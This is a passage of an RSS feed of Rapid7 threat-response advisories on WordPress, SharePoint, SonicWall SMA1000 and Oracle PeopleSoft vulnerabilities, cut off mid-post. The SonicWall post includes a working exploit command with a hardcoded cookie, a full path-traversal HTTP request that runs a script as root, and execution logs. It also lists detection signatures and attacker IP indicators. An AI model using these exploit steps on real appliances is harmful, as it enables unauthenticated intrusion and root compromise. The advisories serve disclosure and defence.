content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 17, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 22, 2026:</strong></span><span style='font-size: undefined;'> Updated post to reflect public reporting of exploitation in the wild; added technical overview following Searchlight Cyber's full disclosure; added temporary WAF mitigation guidance; updated Overview to note CISA KEV addition (July 21).</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-63030-wp2shell-a-critical-remote-code-execution-vulnerability-in-wordpress-core</link>
      <guid isPermaLink="false">bltb79953f01092886f</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Fri, 17 Jul 2026 22:23:03 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-58644: Microsoft SharePoint Server Unauthenticated Remote Code Execution Vulnerability Exploited in the Wild]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 14, 2026, Microsoft </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> a security advisory addressing </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-58644"><span style='font-size: undefined;'>CVE-2026-58644</span></a><span style='font-size: undefined;'>, a critical remote code execution (RCE) vulnerability affecting on-premises Microsoft SharePoint Server deployments. The vulnerability, which carries a CVSS v3.1 score of 9.8 (Critical), results from the deserialization of untrusted data (</span><a href="https://cwe.mitre.org/data/definitions/502.html"><span style='font-size: undefined;'>CWE-502</span></a><span style='font-size: undefined;'>) and allows an unauthenticated attacker to execute arbitrary code.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft confirmed active exploitation of CVE-2026-58644, and the vulnerability was subsequently added to CISA’s Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>KEV</span></a><span style='font-size: undefined;'>) catalog on July 16, 2026. In parallel, CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> guidance recommending organizations immediately apply Microsoft’s security updates and leverage Microsoft Defender and AMSI detections to identify exploitation attempts.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected products:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Enterprise Server 2016</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server 2019</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server Subscription Edition</span></p></li></ul><p><span style='font-size: undefined;'><em>Update:</em></span><span style='font-size: undefined;'> On July 22, 2026, a separate SharePoint vulnerability, CVE-2026-50522, was </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/22/cisa-adds-two-known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to CISA’s KEV catalog. CVE-2026-50522 is a deserialization of untrusted data vulnerability also affecting Microsoft SharePoint, and allows a remote attacker to achieve unauthenticated RCE on a vulnerable system. This separate RCE vulnerability was </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522"><span style='font-size: undefined;'>disclosed</span></a><span style='font-size: undefined;'> and patched by Microsoft as part of the same July 14 </span><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-july-2026/"><span style='font-size: undefined;'>Patch Tuesday</span></a><span style='font-size: undefined;'> release as CVE-2026-58644. Customers who have applied all of the SharePoint security updates from the July 14 updates will be protected against both exploited in-the-wild vulnerabilities.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations operating affected on-premises Microsoft SharePoint Server should prioritize remediation on an emergency basis.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft’s recommendations:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Apply the July 14, 2026 security updates for all affected SharePoint versions.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Verify that security updates completed successfully across all SharePoint servers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ensure Antimalware Scan Interface (AMSI) integration is enabled for every SharePoint web application.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Monitor Microsoft Defender and AMSI detections for indicators of attempted exploitation.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Initiate incident response procedures if exploitation artifacts are detected.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft and CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span style='font-size: undefined;'>recommend</span></a><span style='font-size: undefined;'> monitoring for the following security detections associated with observed SharePoint exploitation activity.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>AMSI / Microsoft Defender detections:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Exploit:Script/SuspSignoutReqBody.A</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Request body scanning</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>SharePoint Server Subscription Edition</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft reports observed exploitation attempts are blocked by this signature.</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Exploit:Script/ToolPaneAuthBypass.A</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Request header scanning</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Applies to SharePoint Server 2016, SharePoint Server 2019, and Subscription Edition.</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Exploit:Script/ToolPaneAuthBypass</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>At the time of publication, no public IP addresses, domains, URLs, or additional network-based indicators of compromise have been widely disclosed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Administrators should consult Microsoft’s </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for the most current remediation guidance and update availability.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;">Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-58644 with an authenticated vulnerability check available since the July 14 content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 17, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></li><li><span style='font-size: undefined;'><strong>July 23, 2026: </strong></span><span style='font-size: undefined;'>Added a description of CVE-2026-50522 to the overview.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-58644-microsoft-sharepoint-server-unauthenticated-remote-code-execution-vulnerability-exploited-in-the-wild</link>
      <guid isPermaLink="false">blt6964e8d39440f50b</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Fri, 17 Jul 2026 18:18:53 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 MDR Team Discovers New SonicWall SMA1000 Zero Days being Actively Exploited (CVE-2026-15409, CVE-2026-15410)]]></title>
      <description><![CDATA[<h2>Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 14, 2026, SonicWall </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008" target="_blank"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15409" target="_blank"><span style='font-size: undefined;'>CVE-2026-15409</span></a><span style='font-size: undefined;'> (CVSS 10.0) and the high-severity code injection vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15410" target="_blank"><span style='font-size: undefined;'>CVE-2026-15410</span></a><span style='font-size: undefined;'>. The advisory urges customers to immediately apply the latest platform hotfix releases.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Successful exploitation of CVE-2026-15409 permits an unauthenticated attacker to open a websocket-based tunnel to arbitrary localhost-only services, while CVE-2026-15410 is a local privilege escalation that permits an attacker with access to an internal service listening on port 8188 on localhost to execute arbitrary operating system commands as root via a malicious path traversal-based </span><span style='font-size: undefined;'><span data-type='inlineCode'>remove_hotfix</span></span><span style='font-size: undefined;'> workflow.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Both vulnerabilities are being actively exploited in the wild. Prior to SonicWall’s official vulnerability disclosure, Rapid7’s Managed Detection and Response team observed active, targeted zero-day exploitation of internet-facing SMA 1000-series appliances. In the SonicWall advisory, exploitation in the wild was </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008#EITW" target="_blank"><span style='font-size: undefined;'>noted</span></a><span style='font-size: undefined;'>, and both </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15409" target="_blank"><span style='font-size: undefined;'>CVE-2026-15409</span></a><span style='font-size: undefined;'> and </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15410" target="_blank"><span style='font-size: undefined;'>CVE-2026-15410</span></a><span style='font-size: undefined;'> have been added to CISA's Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank"><span style='font-size: undefined;'>KEV</span></a><span style='font-size: undefined;'>) catalog. Given the confirmed exploitation activity and the critical unauthenticated impact of the vulnerabilities, organizations should prioritize remediation of SMA1000 appliances on an emergency basis.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected products include SonicWall SMA1000 Series models 6210, 7210, and 8200v running:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03245</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03387</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03434 (platform-hotfix)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02283</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02624</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02800 (platform-hotfix)</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>These vulnerabilities do not affect SSL VPN functionality on SonicWall firewalls or the SMA 100 Series product line.</span></p><h2>Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The primary vulnerability is in a websocket proxy feature, accessed via the path /wsproxy on the affected “SonicWall WorkPlace” application (served on port 443 by default). This feature permits a netcat-like TCP tunnel to arbitrary hosts and ports, which are provided by the user in URL parameters. By provided host values that point to localhost, the attacker can access local SonicWall appliance system services behind the firewall to send and receive arbitrary TCP traffic to and from them. This is the first-stage vulnerability, CVE-2026-15409, that Rapid7 MDR analysts are seeing attackers exploit in the wild. With this capability, an attacker can reach and exploit less-hardened services running on the appliance, such as the Erlang application on localhost:1050 or the ctrl-service application on localhost:8188. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We developed an exploit targeting the Erlang process listening on localhost:1050 for remote code execution. Note that the provided cookie value is hardcoded for the Erlang process, based on our testing, so authentication is not required to establish code execution.</span></p><p></p><pre language="html"># python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'whoami && id && pwd && hostname'
Authenticated to couchdb@127.0.0.1
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 =&gt; couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma</pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>With code execution established, the attacker can escalate to root on the appliance by exploiting CVE-2026-15410, which is a path traversal in the </span><span style='font-size: undefined;'><span data-type='inlineCode'>remove_hotfix</span></span><span style='font-size: undefined;'> workflow of ctrl-service. This can be performed via the web console or by hitting port 8188 on the device. The attacker provides a hotfix value containing a path traversal sequence to a malicious script, such as </span><span style='font-size: undefined;'><span data-type='inlineCode'>../../../../var/tmp/privesc</span></span><span style='font-size: undefined;'>. The system executes the script as root and (typically) reboots the appliance immediately after.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An example malicious request achieving privilege escalation by leveraging this from the web panel is depicted below:</span></p><p></p><pre language="html">POST /rollbackConfirm.action HTTP/1.1
Host: 192.168.181.46:8443
Cookie: EXTRAWEB_REFERER=%252F; JSESSIONID=node01bcg1tbiy6qi7s97xsoa42lhp8.node0
Content-Length: 134
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="24", "Chromium";v="152"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Origin: https://192.168.181.46:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.181.46:8443/rollbackConfirm.action
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrfToken=GFEJUCQBUZOLUCCOO3YBA8G30ZE9VKDP&command=rollback&rollbackUpgradeTime=&hotfix=../../../../../tmp/1234.sh&rollbackHotfixTime=</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>If the provided hotfix file does not exist, a reboot does not occur. If the provided file exists, the system reboots after it chmods and executes the file. Below is a system monitor (pspy) depicting output of this occurring during exploitation:</span></p><p></p><pre language="html">2026/07/09 23:21:00 CMD: UID=0     PID=10355  | chmod +x /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh
2026/07/09 23:21:00 CMD: UID=0     PID=10355  | /bin/bash /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh --unattended
2026/07/09 23:21:00 CMD: UID=0     PID=10361  | /usr/bin/python3 /usr/local/ctrl-service/bin/ctrl-service.py
[...]
2026/07/09 23:21:22 CMD: UID=0     PID=11124  | shutdown -r now</pre><p><span style='color:rgb(15, 71, 97);'></span></p><p><span style='font-size: undefined;'>A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409" target="_blank"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>; a Metasploit module for the chain is in development.</span></p><h2>Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations operating SonicWall SMA1000 appliances should </span><span style='font-size: undefined;'><strong>immediately upgrade</strong></span><span style='font-size: undefined;'> to the latest platform hotfix releases.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Fixed versions are:</span></p><table><colgroup data-width='609'><col style="width:52.052545155993435%"/><col style="width:47.94745484400657%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'>Product</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Fixed Version</span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03453 (platform-hotfix) or later</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02835 (platform-hotfix) or later</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>There are </span><span style='font-size: undefined;'><strong>no workarounds</strong></span><span style='font-size: undefined;'> available.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because active exploitation has been confirmed, organizations should not rely solely on patching. SonicWall additionally recommends:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Performing a thorough forensic review for indicators of compromise.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Re-imaging physical appliances or redeploying virtual appliances if compromise is identified.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Changing user and administrator passwords.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Resetting TOTP tokens following confirmed compromise.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Customers should consult the SonicWall security advisory for the latest remediation guidance and platform hotfix availability.</span></p><h2>Observed exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Prior to SonicWall’s official vulnerability disclosure, our Managed Detection and Response team observed active, targeted exploitation of internet-facing SMA 1000-series appliances. Threat actors were primarily leveraging the perimeter appliance as a stealthy initial access vector, executing commands on the operating system by bypassing traditional input validation controls. Once they established a foothold on the appliance, the actors systematically extracted high-value credentials, active session databases, and Time-Based One-Time Password (TOTP) multi-factor authentication (MFA) seed configurations. This local harvesting was designed to ensure long-term, persistent access that could survive standard network-level remediations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With these harvested resources, the threat actors quickly shifted to lateral movement, pivoting from the compromised appliance directly into the internal corporate network. Specifically, we observed a sequence of anomalous, VPN-less Active Directory authentications targeting core domain controllers. These authentications originated directly from the appliance’s internal IP address, using atypical, non-corporate workstation client names (such as kali or other non-inventory hostnames) under the context of the appliance’s integrated LDAP service account. This unique behavior of direct, machine-level lateral movement with no corresponding active VPN tunnel confirmed that the appliance itself had been fully compromised and was acting as an unmonitored backdoor into the corporate directory infrastructure.</span></p><h2>Artifacts or evidence sources and IOCs</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 recommends reviewing appliance logs for evidence of active exploitation, including the following characteristic behaviors and specific log indicators:</span></p><h3><span style='font-size: undefined;'>Characteristic behaviors</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Websocket exploit IOC log patterns:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><span data-type='inlineCode'>extraweb_access.log</span></span><span style='font-size: undefined;'> entries containing the strings ("GET" AND "wsproxy" AND "=-3389" AND “ 101 “) indicate interactions with the niche affected service. If suspicious host parameter values such as “localhost” or “::ffff:127.0.0.1” are present, that’s indicative of likely exploitation of CVE-2026-15409. Note that “serviceType=SSH” was used in our published materials, but options such as “serviceType=TELNET” are viable alternatives.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Hotfix removal exploit IOC log patterns:</strong></span><span style='font-size: undefined;'> The </span><span style='font-size: undefined;'><span data-type='inlineCode'>ctrl-service.log</span></span><span style='font-size: undefined;'> shows the hotfix-removal utility (</span><span style='font-size: undefined;'><span data-type='inlineCode'>/usr/local/bin/remove_hotfix</span></span><span style='font-size: undefined;'>) being invoked with traversal sequences pointing to attacker-staged shell script payloads (e.g., ../../../../../../tmp/sma1000_5c47.sh). This is indicative of successful exploitation of CVE-2026-15410.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Internet-facing probing:</strong></span><span style='font-size: undefined;'> Enumeration of the SMA portal, including repeated requests to /auth1.html, path-traversal attempts, and generic file/enumeration requests (e.g., </span><span style='font-size: undefined;'><span data-type='inlineCode'>/.env</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>/api/sonicos/is-sslvpn-enabled</span></span><span style='font-size: undefined;'>).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Authentication activity:</strong></span><span style='font-size: undefined;'> Authentication-API activity against </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/logon/&lt;session-id&gt;/authenticate</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Sensitive path access:</strong></span><span style='font-size: undefined;'> Access to sensitive appliance paths such as </span><span style='font-size: undefined;'><span data-type='inlineCode'>/tmp/temp.db*</span></span><span style='font-size: undefined;'>, consistent with theft of stored session data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>AD/Service Account Compromise:</strong></span><span style='font-size: undefined;'> NTLM logons (Windows Event ID 4624, logon type 3) into internal domain controllers sourced from the appliance's internal IP address, using attacker-controlled workstation names (e.g., kali) without a corresponding VPN session.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>extraweb_access.log:</strong></span><span style='font-size: undefined;'> Requests to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/login</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/logou</span></span><span style='font-size: undefined;'>t returning HTTP 200, and requests to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/wsproxy</span></span><span style='font-size: undefined;'> containing suspicious host parameters returning HTTP 101.</span></p><h3><span style='font-size: undefined;'>Configuration artifacts</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>/var/lib/unit/conf.json</span></span><span style='font-size: undefined;'> containing routes for </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/login</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/logout</span></span><span style='font-size: undefined;'>, which are not present in legitimate configurations.</span></p><h3><span style='font-size: undefined;'>Atomic Indicators</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><strong>F.N.S Holdings Limited (ASN - 206092): </strong></span><span style='font-size: undefined;'>The threat actor(s) utilized varying IP addresses, but they belonged to the VPN hosting provider FNS Holdings Limited. Limit or block access to FNS Holdings Limited if there is no business need. For reference, the IP addresses we observed were:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.131.194.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.146.54.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>63.135.161.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>173.239.211.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>193.37.32[.]179</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>193.37.32[.]214</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>216.73.163[.]151</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>216.73.163[.]158</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Attacker Asset Names:</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-KRLUI3J</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-IC3C80F</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-5P0TSCP</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>KALI</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>localhost</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>If any indicators of compromise are identified, organizations should treat the appliance as compromised and follow SonicWall’s recovery guidance.</span></p><h2>Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations should prioritize identifying all internet-facing SonicWall SMA1000 appliances and determine whether affected software versions remain deployed. Given SonicWall’s and Rapid7’s confirmation of active exploitation, exposed appliances should be considered high-priority assets for remediation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security teams should also review available authentication, web access, and appliance management logs for the indicators published by SonicWall to determine whether follow-up incident response activities are warranted.</span></p><h3>Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers will be able to assess exposure to </span><span style='font-size: undefined;'><strong>CVE-2026-15409</strong></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><strong>CVE-2026-15410</strong></span><span style='font-size: undefined;'> with authenticated vulnerability checks available in the July 15 content release.</span></p><h2>Updates</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 15, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li><li><span style='font-size: undefined;'><strong>July 16, 2026: </strong></span><span style='font-size: undefined;'>Additional IOCs identified and blog section updated with the identified attacker asset names.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410</link>
      <guid isPermaLink="false">bltfb1c918a8a50c247</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 15 Jul 2026 16:19:26 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Active Exploitation of Oracle PeopleSoft Zero-Day (CVE-2026-35273)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On June 10, 2026, Oracle published a </span><a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html"><span style='font-size: undefined;'>security alert</span></a><span style='font-size: undefined;'> for </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-35273"><span style='font-size: undefined;'>CVE-2026-35273</span></a><span style='font-size: undefined;'>, a critical vulnerability in the Updates Environment Management component of PeopleSoft Enterprise PeopleTools. Oracle released an out-of-band patch the same day as the advisory, underscoring the urgency of remediation. The vulnerability has a CVSSv3.1 score of </span><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8</span></a><span style='font-size: undefined;'> and is remotely exploitable without authentication. Per the vendor advisory, successful exploitation may result in remote code execution (RCE). TrendAI has </span><a href="https://success.trendmicro.com/en-US/solution/KA-0023679"><span style='font-size: undefined;'>classified</span></a><span style='font-size: undefined;'> the underlying flaw as a server-side request forgery (</span><a href="https://cwe.mitre.org/data/definitions/918.html"><span style='font-size: undefined;'>CWE-918</span></a><span style='font-size: undefined;'>). PeopleTools versions </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.61</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.62</span></span><span style='font-size: undefined;'> are affected.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-35273 was reported to Oracle through TrendAI's Zero Day Initiative. According to a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit"><span style='font-size: undefined;'>report published by Mandiant</span></a><span style='font-size: undefined;'> on June 11, 2026,</span><span style='font-size: undefined;'><strong> this vulnerability has been exploited in the wild as a zero-day prior to the vendor security alert</strong></span><span style='font-size: undefined;'>, with active exploitation observed between May 27 and June 9, 2026, predating Oracle's advisory by two weeks. The vulnerability was added to the CISA KEV on June 12, 2026.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Mandiant has attributed the campaign to UNC6240 (ShinyHunters), a financially motivated cybercriminal collective known for data theft and extortion. ShinyHunters has been linked to breaches across cloud services, SaaS platforms, and telecommunications providers, frequently exploiting weak authentication controls, stolen credentials, and cloud misconfigurations rather than deploying sophisticated malware.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Based on information published by Mandiant, the campaign heavily targeted the higher education sector; 68 percent of the more than 100 notified organizations were universities and colleges. The observed exploitation targeted PeopleSoft's Environment Management Hub (PSEMHUB) endpoints, and data stolen during the campaign was published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span 